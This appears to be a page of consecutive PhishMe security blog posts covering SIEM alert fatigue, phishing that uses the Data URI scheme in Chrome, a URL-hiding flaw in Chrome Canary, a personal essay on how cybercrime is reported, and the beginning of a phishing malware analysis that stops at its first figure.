SIEM: So Many Alerts, So Little Time

Software vendors participate in industry events for various reasons. We attend to share information as speakers and to learn as attendees. You’ll see us sponsor tote bags, snack stations, and even lunch. We are there to raise awareness of our solutions and generate leads for our sales team. We like scanning badges as much as you like getting schwag but for most vendors like us, the best use of our time in the booth is not spent waving a scanner.

It is “events season” in the security world and PhishMe has been an active participant in events like RSA, FS-ISAC and more. SecureWorld, hosted at the Cobb Galleria in Atlanta, offered an particularly enthusiastic crowd, well-attended sessions and an expo floor filled with vendors interacting with conference attendees. We made some new friends with our neighbors from PhishLine and enjoyed meeting everyone who stopped by our booth to learn more about how we’re helping companies deal with the latest email-based phishing and malware attacks. It’s a great opportunity for us, as a company serving the InfoSec community, to learn more about the latest problems companies are trying to solve and to hear firsthand about the state of cybersecurity from those in the trenches.

All of this activity led to a successful industry event and a lot of fun. However, there is one key benefit of attending industry events like this that is rarely discussed. We were fortunate enough to experience it this year at SecureWorld: the conversations.

One particular conversation stands out from the rest this week. We met a gentleman whose main responsibility is the company’s Security Information and Event Management (SIEM). He has successfully worked with internal teams to integrate logs from their AV, DLP, IDS and a few other appliances. After hearing so many stories about scaled back SIEM implementations or completely stalled deployments resulting in expensive shelfware, I offered my congratulations and started asking about this significant achievement. I was eager to take notes! Everybody needs a win now and then and we usually only hear about the bad news.  So, I was surprised and a little disheartened when his reply wasn’t about the success but rather the frustration in getting other teams to leverage the information coming out of the SIEM. At best, the response has been sluggish. Security teams are always busy and automated ticketing systems can be overwhelming. But still, I have to wonder if responding to tickets initiated by the SIEM is a higher priority at Target these days?

We can probably all agree that security alerts should be handled and followed-up. But, “should” is not necessarily reality. In a recent article published on DarkReading, Joshua Goldfarb discussed that security professionals often experience alert fatigue and become desensitized to security alerts. The reasons, argues Goldfarb, is that many organizations experience a low signal-to-noise ratio, meaning that there is a high volume of signals, the majority of which are noise. He offers the recent breaches at Target and Niemen Marcus as examples of instances where alerts were issues, but were not handled properly by internal security teams.

I also have to wonder if better information about the day’s top threats could help elevate the important SIEM alerts to make sure critical issues are addressed quickly? Could threat intelligence be used by the SIEM to escalate specific tickets that would otherwise remain under the radar of the dedicated but stressed InfoSec team?

Phishing Attacks Target Google Users with Weakness in Chrome: What You Need to Know

If your employees are users of Google Chrome and/or Mozilla Firefox, your network could be vulnerable to a unique phishing attack targeting the two most widely-used browsers in the world. Several media outlets are covering the uniform resource identifiers (URI) exploit, which Google Chrome and other web browsers utilize in order to display data.

This attack, which is difficult to identify via traditional methods, allows cybercriminals to gain access to Google Play, Google+ and Google Drive. This means that any sensitive information stored within each of those areas is up for the taking. In the case of Google Play that means credit card information. In the case of Google Drive, that means a considerable amount of potentially highly sensitive data.

Other brands have also been spoofed recently using the same browser display vulnerability. On May 8, 2014, PhishMe’s phishing intelligence analysts noticed a quirk in Chrome. When viewing an eBay Canada spoofed login page in Chrome, the only text displayed in the browser address bar was the word “data:” as shown in the image below:

That phishing attack was utilizing what is known as the Data URI Scheme to encode the entire source code of the phishing page into the address bar. As can be seen in the next screenshot; however, Firefox displays the Base64 encoding in the address bar, which a security-savvy user would be more likely to notice.

The second and third steps of the eBay Canada phishing attack were also carried out using the Data URI Scheme. As the victim was enticed to enter more of their personally identifying information, the attacker presented page after page of spoofed eBay pages, eventually collecting the victim’s eBay user ID, password, full name, address, ZIP code, mother’s maiden name, date of birth, credit card number, CVV code, and card expiration date.

The Google account phish in the news also uses the Data URI Scheme. The Google phishing attack was reportedly initiated via an email message in which the attackers posed as Google with the subject “data notice” or “new lockout notice.”

These phishing scams play on users fears that they are being targeted by cybercriminals, yet responding to those very attacks results in them giving their sensitive information to the attackers. The use of the data URI scheme makes these phishing scams easy to identify, but only if users know what to look for.

In the case of the eBay Canada phishing attack, the word ‘data’ may arouse suspicion, but would that suspicion be enough for the user to recognize that this was in fact a scam? For many employees, Base64 encoding displayed in the address bar may not even be noticed. Unless employees are trained to recognize these signs of phishing attacks, there is a high chance that they may be fooled. That doesn’t just mean that they will be handing over their eBay credentials. Many phishing attacks on businesses are conducted to obtain sensitive business login credentials.

Would your employees be able to identify phishing scams like these? Do you provide training to ensure that ALL of your employees are aware of these indicators of a phishing attack? Do you test that knowledge to see whether it has been taken on board and is being applied?

Abusing Google Canary’s Origin Chip makes the URL completely disappear

Canary, the leading-edge v36 of the Google Chrome browser, includes a new feature that attempts to make malicious websites easier to identify by burying the URL and moving the domains from the URI/URL address bar (known in Chrome as the “Omnibox”) into a location now known as “Origin Chip”. In theory, this makes it easier for users to identify phishing sites, but we’ve discovered a major oversight that makes the reality much different.

Canary is still in beta, but a flaw that impacts the visibility of a URL is typically something we only see once every few years. We’ve discovered that if a URL is long enough, Canary will not display any domain or URL at all, instead showing an empty text box with the ghost text “Search Google or type URL.” While Canary is intended to help the user identify a link’s true destination, it will actually make it impossible for even the savviest users to evaluate the authenticity of a URL.

Numbers of Victims of Cybercrime are Soaring

Reports from law enforcement agencies around the world show that there have been even more victims of cybercrime in the past 12 months than in any other year. Attacks are being conducted alarmingly frequently, and cybercriminals are becoming even more brazen. However, cybercrime is still not dealt with in the same way as other types of crime.

Say you leave home, only to return to your front door kicked in. Everything of value has been stolen. What would you do?

You’d call the police immediately, right?

Now pretend you get an email from what looks to be your bank. They inform you that your banking password needs changed. A link to do so is embedded in the email. The next time you log into your account $1,000.00 is missing. Who would you call?

Most people would instinctively call their bank. But, why wouldn’t they call the police?

You should call the police first. After all, it is a crime. However, this is not how we typically approach online theft. Not only have I devoted my life to identifying and stopping cybercrime, but I’m a victim as well. My mission from the beginning has been this: I want to change people’s thinking about online theft.

On a trip to the grocery store, my card was declined for a small purchase. Knowing that there was more than enough to cover the bill, I contacted my bank only to find out that someone had gone to a Wal-Mart three times and spent $1,800.00 out of my account.

I called the police immediately. They only wanted to file a police statement so the bank would return the money.

The main focus wasn’t just getting my money returned. I also wanted to track down the criminal and put them in jail. However, the police didn’t seem interested. The crook lived in San Diego and I’m in Alabama. They would need to catch the criminal, fly him to Alabama, then house and feed him until the trial. The cost of these expenditures would far outweigh the $1,800.00 that was stolen.

Not satisfied with what I was hearing, I contacted the San Diego District Attorney.  They informed me that they’d be glad to help as long as I’d sign an affidavit stating my wife or I would fly to San Diego to testify. Without a witness during the trail, the criminal would most likely be let go with no penalties. The cost of the ticket with room and board during the trial would have been more than the $1800 I had already lost.

I was unable to afford the trip, so I began fighting in a different way.

I began devoting all my time to tracking down cybercriminals and sharing the information that I found, in order to help people protect themselves.

I began to ask, “Why we don’t treat cybercrime the same as physical crime”? If someone would break into your home and steal your TV, we blame the robber. If someone steals $1,000.00 out of your PayPal account, we blame the victim for not having sufficient firewall protection or prevention software. What’s wrong with this picture?

Why are these crimes not acknowledged or tracked by the government? In 2012 alone, there were 18 new victims of cybercrime every second. 9 million of those fell victim to fake banking websites. 19 million Americans had money taken off their credit cards without authorization. 43% of Americans are still the target of large amounts of spam.  Despite this, none of these activities are tracked by the Department of Justice.

While I continue the fight to inform people of cybercriminal activity and change tracking procedures, what can the consumer to do protect himself? Consumers should monitor receipts, credit card statements and bank accounts.  And, although this isn’t the way that things are currently handled, I believe in the mantra “If you see something, say something.” When consumers are victimized by cybercrime, they should call the police, and if they don’t respond the way that we all think they should. Also, consumers should let their elected officials know by contacting their congressmen and senators. It needs to be known that we want justice against these crimes.

Learn more about my personal experience with cybercrime by viewing my recent talk on the TedX Birmingham Stage:

How did you get into the security industry? Was it a personal experience with cybercrime? Share your experience in the comments section below.

Phishing with a malicious .zip attachment

A few weeks ago, we received a round of phishing emails with malware that seemed a little more special than your run-of-the-mill ZeuS, so we decided to give it some analysis. The email was reported by a user at PhishMe. We really do drink our own kool-aid. Figure 1 shows a screenshot of the email that is being analyzed.

Figure 1

Figure 1 — Original Message